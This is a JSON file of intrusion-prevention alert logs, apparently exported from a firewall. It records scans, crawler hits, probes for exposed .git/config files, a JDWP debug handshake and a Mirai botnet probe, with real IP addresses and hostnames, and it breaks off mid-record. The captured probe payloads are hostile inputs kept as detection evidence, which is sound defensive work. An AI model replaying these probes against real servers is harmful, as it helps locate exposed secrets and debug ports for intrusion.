dt_automate/ce.json
2025-02-27 18:37:03 +08:00



{
"NTOP":{
"LogPaging":
[{"LogType":"1","ID":"1766","UserID":"65538","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":33432,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":24881,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Git 客户端命令执行漏洞(CVE-2014-9390)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:42:32\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"45.144.212.139\",\"User\":\"45.144.212.139\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2014-9390\",\"MSB\":\"\",\"BID\":\"BID-71732\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/.git\/objects\/\",\"Payload\":\"GET \/.git\/objects\/ HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.80\\\\0d\\\\0aUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/76.0.3809.100 Safari\/537.36\\\\0d\\\\0aAccept-Charset: utf-8\\\\0d\\\\0aAccept-Encoding: gzip\\\\0d\\\\0aConnection: close\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"CommandInjection\",\"MethodSubNameCN\":\"命令注入\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"131074","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":39780,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:25:52\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"66.240.236.109\",\"User\":\"66.240.236.109\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"196610","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":26451,\"DestPort\":443,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":35764,\"Severity\":30,\"HddInfo\":false,\"Application\":\"general_tcp\",\"ThreatName\":\"CVE-2017-6639_Oracle_Java_Debug_Wire_远程调试漏洞\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:13:37\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"64.226.111.62\",\"User\":\"64.226.111.62\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2017-6639\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\"\",\"HttpFirstLine\":\"\",\"Payload\":\"JDWP-Handshake\\\\00\\\\00\\\\00\\\\0b\\\\00\\\\00\\\\00\\\\01\\\\00\\\\01\\\\01\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"RemoteCodeExecution\",\"MethodSubNameCN\":\"远程代码执行\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"262146","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":59201,\"DestPort\":16001,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:10:18\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.239\",\"User\":\"15.235.224.239\",\"DestIPAddr\":\"121.30.199.65\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.65\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"327682","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":59201,\"DestPort\":16001,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T23:10:17\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.239\",\"User\":\"15.235.224.239\",\"DestIPAddr\":\"121.30.199.65\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.65\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"393218","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58968,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T21:32:38\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"134.199.151.205\",\"User\":\"134.199.151.205\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.79\\\\0d\\\\0aUser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/81.0.4044.129 Safari\/537.36\\\\0d\\\\0aAccept-Encoding: gzip, deflate\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"458754","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":50568,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T21:07:47\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"134.199.151.205\",\"User\":\"134.199.151.205\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.82\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.82\\\\0d\\\\0aUser-agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/81.0.4044.129 Safari\/537.36\\\\0d\\\\0aAccept-Encoding: gzip, deflate\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"524290","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41287,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T19:02:09\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"589826","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41287,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T19:02:08\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"655362","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":33620,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:45:40\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"720898","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":55748,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:45:29\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"786434","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58390,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T18:44:54\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"4.156.21.82\",\"User\":\"4.156.21.82\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.82\",\"HttpFirstLine\":\"\/hudson\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"851970","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49781,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:38:21\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"917506","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49781,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:38:20\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"15.235.224.238\",\"User\":\"15.235.224.238\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"983042","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":46446,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":45845,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"访问敏感文件.git_config通信流量\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:36:09\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"35.216.149.150\",\"User\":\"35.216.149.150\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80\",\"HttpFirstLine\":\"\/.git\/config\",\"Payload\":\"GET \/.git\/config HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.80\\\\0d\\\\0aUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko\/20100101 Firefox\/103.0 abuse.xmco.fr\\\\0d\\\\0aAccept-Encoding: gzip\\\\0d\\\\0aConnection: close\\\\0d\\\\0a\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"SensitiveInfo\",\"MethodSubNameCN\":\"敏感信息泄露\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1048578","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":35580,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":35419,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"僵尸网络:Mirai_2.0\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:30:49\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"196.251.85.250\",\"User\":\"196.251.85.250\",\"DestIPAddr\":\"121.30.199.80\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.80:80\",\"HttpFirstLine\":\"\/login.rsp\",\"Payload\":\" Hello World\\\\0d\\\\0a\",\"MethodName\":\"MalwareTraffic\",\"MethodNameCN\":\"恶意流量\",\"MethodSubName\":\"BotnetTraffic\",\"MethodSubNameCN\":\"僵尸网络流量\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1114114","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":43464,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T17:12:12\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.70\",\"User\":\"111.225.148.70\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" pcq.datong12380.gov.cn\",\"HttpFirstLine\":\"\/robots.txt\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1179650","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":24756,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:45:27\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.30\",\"User\":\"111.225.148.30\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/view\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1245186","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":22712,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:45:26\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.30\",\"User\":\"111.225.148.30\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 